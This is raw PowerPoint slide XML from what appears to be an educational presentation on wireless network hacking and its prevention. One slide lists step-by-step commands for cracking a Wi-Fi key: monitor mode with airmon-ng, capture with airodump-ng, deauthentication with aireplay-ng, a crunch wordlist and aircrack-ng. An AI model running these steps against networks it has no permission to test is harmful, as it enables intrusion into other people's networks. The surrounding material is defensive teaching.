                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-65" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="65" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-190" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-14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X</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-70" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-14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w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="65" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="60" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-254" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>.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723900"/>
            <a:ext cx="1706880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Step 0 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Check for wireless interface configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	CMD: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>iwcnfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p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Step 1 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Start the wireless interface in monitor mode on the specific radio channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>-ng start &lt;Interface name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>eg:wlan0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	kill the processes otherwise may cause in further steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	CMD: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>kill &lt;PID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>eg:732</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p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Step 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  =&gt; start Wi-Fi sniffing tools to Test the injection capability of  the wireless device and filter to collect unique IVs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>-ng  -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> &lt;BSSID(48 bits)&gt; -c &lt;CH&gt; --write &lt;capture_File_Name&gt; &lt; Interface  name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	Where:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	-c : on which channel operating targeted device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> : MAC address of an access point that has set up a BASIC SERVICE SET(BSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: 			00:14:6C:7E:40:80</a:t>
            </a:r>
          </a:p>
          <a:p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Step 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> =&gt; start a packet encryption tool such as airplay-ng to do a fake authentication in ARP request reply mode to inject 		packets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CMD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US" sz="2400" b="1" dirty="0"/>
              <a:t>aireplay-ng  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> &lt;# packets to send eg:1000&gt;  -a  &lt;BSSID&gt; &lt; Interface  name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>where   :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: DE authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-a: 00:14:6C:7E:40:80 is the access point MAC address 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Step 4 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use tool crunch to generate password list </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	CMD: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>crunch &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>min_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>max_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; &lt;characters&gt; -o &lt;filename.txt&gt;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Step 5  =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>cracking tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-ng to extract encryption key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>fron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Initial vectors(IVs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	CMD : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>-ng &lt; capture_File_Name&gt; -w &lt;filename.txt&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3774553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9140" y="1526424"/>
            <a:ext cx="10474960" cy="7229475"/>
            <a:chOff x="1289140" y="1526424"/>
            <a:chExt cx="10474960" cy="72294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5323" y="1526424"/>
              <a:ext cx="8648699" cy="72294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89140" y="2364106"/>
              <a:ext cx="6584950" cy="5558790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6584950" h="5558790">
                  <a:moveTo>
                    <a:pt x="4865725" y="5558789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="242493" y="5558789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193622" y="5553866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148104" y="5539747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106913" y="5517405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71024" y="5487816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41414" y="5451954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19056" y="5410793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4926" y="5365308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5316473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="242315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4926" y="193480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19056" y="147995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41414" y="106834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71024" y="70972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106913" y="41383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148104" y="19042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193622" y="4922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242493" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6342288" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6391159" y="4922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6436678" y="19042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6477869" y="41383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6513757" y="70972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6543368" y="106834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565725" y="147995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6579855" y="193480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6584782" y="242315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6584782" y="1373123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6579855" y="1421959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565725" y="1467444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6543368" y="1508605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6513757" y="1544467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6477869" y="1574056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6436678" y="1596397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6391159" y="1610516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6342288" y="1615439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5828651" y="1615439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5779780" y="1620362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5734262" y="1634482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5693071" y="1656823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5657182" y="1686412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5627572" y="1722274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5605214" y="1763435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5591084" y="1808920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5586158" y="1857755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5586158" y="4004662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5581308" y="4052847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5567398" y="4097742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5545383" y="4138389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5516218" y="4173828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5480861" y="4203102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5440266" y="4225250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5395389" y="4239316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5298986" y="4249362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5254110" y="4263428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5213515" y="4285577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5178158" y="4314850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5148993" y="4350290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5126978" y="4390936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5113067" y="4435831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5108218" y="4484016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5108218" y="5316473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5103292" y="5365308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089162" y="5410793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066804" y="5451954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5037193" y="5487816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5001305" y="5517405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4960114" y="5539747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4914596" y="5553866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4865725" y="5558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39523" y="2473326"/>
            <a:ext cx="6080125" cy="5283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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="8600" spc="-415" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-740" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-425" dirty="0"/>
              <a:t>ev</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-125" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-745" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-490" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-645" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-270" dirty="0"/>
              <a:t>g  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-210" dirty="0"/>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-509" dirty="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-505" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="8600" spc="-405" dirty="0"/>
              <a:t>Hacking</a:t>
            </a:r>
            <a:endParaRPr sz="8600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11887200" y="2224867"/>
            <a:ext cx="5060295" cy="64643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167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sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="10" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5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w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h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i="1" spc="254" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="110" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/WPA3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
